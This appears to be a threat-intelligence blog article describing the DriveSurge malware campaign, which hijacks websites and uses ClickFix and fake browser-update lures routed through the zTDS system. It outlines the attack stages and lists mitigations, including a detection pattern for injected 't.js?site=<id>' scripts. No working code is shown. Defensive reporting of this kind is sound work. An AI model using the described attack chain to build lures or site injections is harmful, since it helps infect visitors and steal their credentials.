Overview A large‑scale malware distribution campaign led by a threat actor known as DriveSurge has compromised thousands of websites, redirecting unsuspecting visitors to malware‑delivery infrastructure. According to SilentPush Labs, the campaign leverages two social‑engineering techniques — ClickFix and FakeUpdates — to infect systems and harvest credentials.
DriveSurge operates as an initial access broker (IAB) under a pay‑per‑install (PPI) model, selling access to compromised endpoints for follow‑on attacks.
Attack Flow
The campaign uses a Traffic Distribution System (TDS) called zTDS, an open‑source framework active since 2015, to profile visitors and determine which lure — ClickFix or FakeUpdates — is most effective.
| Stage | Technique | Objective |
|---|---|---|
| Website Compromise | Injection of malicious JavaScript (t.js?site=<id>) | Redirect visitors to malware infrastructure |
| Traffic Profiling | zTDS evaluates OS, browser, and region | Selects appropriate lure |
| ClickFix Attack | Victims copy and execute PowerShell commands | Installs malware under guise of fixing issues |
| FakeUpdates Attack | Fake browser update prompts (Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser) | Triggers malicious downloads |
| Payload Delivery | ZIP archive with DLLs and Browser Update.exe | Deploys malware and establishes persistence |
SilentPush researchers identified eight technical fingerprints linking the campaign’s infrastructure, including 80 malicious injection domains and pre‑weaponized sites awaiting activation.
Technical Insights
The ClickFix technique hijacks the clipboard and manipulates command execution, while FakeUpdates delivers malicious executables disguised as legitimate browser updates.
A highlighted case involved a fake Firefox update that downloaded a ZIP archive containing multiple DLLs and a malicious executable named Browser Update.exe.
Researchers also discovered an obfuscated JavaScript payload targeting macOS systems, confirming that DriveSurge’s reach extends beyond Windows environments.
Mitigation Steps
To defend against DriveSurge’s tactics, users and administrators should:
- Download updates only from official menus (e.g., About > Check for Updates).
- Avoid executing unknown commands in PowerShell or Terminal.
- Scan websites for JavaScript injections following the
t.js?site=<id>pattern. - Monitor for zTDS traffic and redirect anomalies.
- Educate users about social‑engineering lures disguised as technical fixes or updates.
Expert in the Cloud Insight
The DriveSurge campaign exemplifies the evolution of social‑engineering malware distribution — blending legitimate site hijacking with adaptive lures powered by traffic profiling.
For defenders, the takeaway is clear: visibility into web scripts, browser update integrity, and user education are now critical components of modern cyber resilience.
Leave a Reply